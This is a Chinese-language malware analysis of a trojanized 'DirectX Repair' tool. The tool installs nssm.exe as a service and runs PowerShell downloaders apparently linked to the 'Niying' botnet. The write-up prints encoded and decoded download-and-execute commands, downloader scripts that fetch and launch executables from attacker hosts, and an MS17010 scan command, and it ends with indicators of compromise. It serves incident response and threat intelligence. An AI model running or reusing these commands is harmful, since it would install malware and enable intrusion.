一、 背景近日,在帮助用户解决病毒问题时,发现用户中的是下载者木马。其中一条日志内容为:防护项目:利用PowerShell执行可疑脚本执行文件:C:WindowsSystem32WindowsPowerShellv1.0powershell.exe执行命令行:"powershell.exe" -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA==操作结果:已允许进程ID:6504操作进程:C:Windowsnssm.exe操作进程命令行:C:Windowsnssm.exe操作进程校验和:32559A80C27A69C15A1AAAD2B6AE7B893ECF69B1父进程ID:1080父进程:C:WindowsSystem32services.exe父进程命令行:C:Windowssystem32services.exe操作系统目录竟然出现了nssm工具将操作进程命令行进行base64解密即可得到:IEX ((new-object net.webclient).downloadstring('hxxp://ye.yearidper.com'))通过查询威胁情报,寻找到一个类似的样本hxxp://win.yearidper.com/per.txt继续研究安全日志,发现一条日志内容为:防护项目:利用PowerShell执行可疑脚本执行文件:C:WindowsSysWOW64WindowsPowerShellv1.0powershell.exe执行命令行:powershell "IEX (New-Object Net.WebClient).DownloadString('hxxp://cdn.comenbove.com/Ladon66.jpg'); Ladon 10.111.114.1/16 MS17010"操作结果:已阻止进程ID:18248操作进程:C:WindowsSysWOW64cmd.exe操作进程命令行:cmd.exe /c powershell "IEX (New-Object Net.WebClient).DownloadString('hxxp://cdn.comenbove.com/Ladon66.jpg'); Ladon 10.111.114.1/16 MS17010"操作进程校验和:4048488DE6BA4BFEF9EDF103755519F1F762668F父进程ID:13520父进程:C:WindowsSysWOW64mmc.exe父进程命令行:mmc.exe将该URL下载后,发现其为PowerShell下载者木马。再次查阅安全日志:病毒名称:Trojan/Agent病毒ID:A68B6378A5A9FBBE病毒路径:C:UsersPublicsharpwmi.exe操作类型:修改操作结果:已处理进程ID:13520操作进程:C:WindowsSysWOW64mmc.exe操作进程命令行:mmc.exe父进程:C:WindowsSysWOW64WindowsPowerShellv1.0powershell.exe发现病毒将部分文件保存至C:UsersPublic下,打开C:UsersPublic,发现多个永恒之蓝漏洞攻击程序和爆破攻击程序(pass.txt为密码字典,user.txt为用户名字典):
继续翻阅安全日志:风险路径:C:Windowssystem32WMIHACKER_0.6.vbs, 病毒名:Backdoor/VBS.WMIHacker.a, 病毒ID:a81b2725827b6a11, 处理结果:已处理,删除文件风险路径:C:WindowsSysWOW64WMIHACKER_0.6.vbs, 病毒名:Backdoor/VBS.WMIHacker.a, 病毒ID:a81b2725827b6a11, 处理结果:已处理,删除文件可发现病毒往系统目录塞了两个可疑vbs,文件名为WMIHACKER_0.6.vbs经过查询,WMIHACKER为内网横向渗透攻击工具。询问用户后,用户称下载并运行了一个“dx修复工具”(DirectXRepair_4.1.0.30770_Online.rar)后出现相关症状。二、追溯(一)通过hxxp://ye.yearidper.com,可查询到之前多人在多个论坛中此毒,如下图所示: 
(二)1.通过对hxxp://cdn.comenbove.com的威胁情报查询,发现了一个通信样本(9438183a93abc1f1dbb980b9de99bb8838267f6ca14cb33b1e29b42ebb8dfa97): 
该样本伪装为Steam相关文件PE文件信息:文件说明:Steam文件版本:2.10.91.91产品名称:Steam语言:0x0816 0x04e4版权:© Valve Corporation运行后,该样本会直接访问并下载hxxp://cdn.comenbove.com/shell.txt,内容为Powershell下载者木马:(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:ProgramDataRun.txt')(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:ProgramDatacp.exe')(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:ProgramDatamsvcr120.dll')(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:ProgramDataabc.jpg')Start-Process -FilePath C:ProgramDatacp.exe C:ProgramDataRun.txt该样本同时会执行命令行:powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA1AGQALgBiAGIAYQBjAHAAdQBtAG0AZAAuAGMAbABvAHUAZAAnACkAKQA=base64解密后为:IEX ((new-object net.webclient).downloadstring('hxxp://5d.bbacpummd.cloud'))访问并下载hxxp://5d.bbacpummd.cloud,内容为:(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:ProgramDataRun.txt')(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:ProgramDatacp.exe')(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:ProgramDatamsvcr120.dll')(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:ProgramDataabc.jpg')Start-Process -FilePath C:ProgramDatacp.exe C:ProgramDataRun.txt同时,我们发现,样本还会访问并下载http://5d.strongapt.ml当中的文件,但网站已挂,经过查询发现该域名曾被用于“匿影”僵尸网络投放此前的“WannaRen”勒索病毒(360发现,此前地址为hxxps://api.strongapt.ml/vmp2.jpg),奇安信也早已将多个通信域名标记为“HideShadowMiner”家族处理。
实锤为疑似“匿影”僵尸网络相关病毒样本。2.通过对hxxp://cdn.comenbove.com的威胁情报查询,又发现该
服务器还有一个hxxp://cdn.comenbove.com/smb.jpg,如下图所示:
内容为:$fileNames = Test-Path C:ProgramDatasmbx22.txt$nic='True'if($fileNames -ne $nic){(new-object System.Net.WebClient).DownloadFile( 'https://www.upload.ee/files/14046702/1.txt.html','C:ProgramDatasmbx22.txt') }(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:ProgramDataRun.txt')(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:ProgramDatacp.exe')(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:ProgramDatamsvcr120.dll')(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:ProgramDataabc.jpg')Start-Process -FilePath C:ProgramDatacp.exe C:ProgramDataRun.txt(
https://www.upload.ee/files/14046702/1.txt.html为0kb空白空文件)三、对带毒DirectXRepair进行探究文件名:DirectX Repair.exePE文件信息:
File Version Information:Original Name:加入任务计划.exeInternal Name:加入任务计划File Version:1.0文件运行后,会一边释放“dx修复工具”所需文件,一边释放nssm.exe至系统目录下:Files Dropped:%ProgramData%DirectX Repair.exe%windir%nssm.exe随后,便会命令行执行:%windir%nssm.exe install nssmsevr powershell.exe -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA(与“一、背景”一章当中为同一个Powershell命令,base64解密结果与第一章一致)经过分析,样本会在%ProgramData%内释放正常使用“dx修复”功能所需的组件,而背后又在一边偷偷释放和执行%windir%nssm.exe与cmd或Powershell下载者木马命令行,相关思维导图如下图所示:
四、价值意义“匿影”僵尸网络曾投放“WannaRen”等勒索病毒,甚至有一部分用户中此病毒时同时中了勒索病毒(暂时无法确定其是否有关联),虽然暂未发现其他行为,但是对用户危害较大,其危害性不容小觑,用户发现告警后需及时处理。五、Iocshxxp://ye.yearidper.comhxxp://cdn.comenbove.com/Ladon66.jpghxxp://cdn.comenbove.com/shell.txthxxp://cdn.comenbove.com/smbdown/cp.txthxxp://cdn.comenbove.com/smbdown/abc.jpghxxp://cdn.comenbove.com/Asy.jpghxxp://cdn.comenbove.com/smb.jpghxxp://5d.bbacpummd.cloud/*本文当中恶意链接均已做无害化处理(hxxp),base64代码可能会被防病毒软件检测到属正常现象网页不可被直接执行为了保证文章尽量完整暂时不做处理。
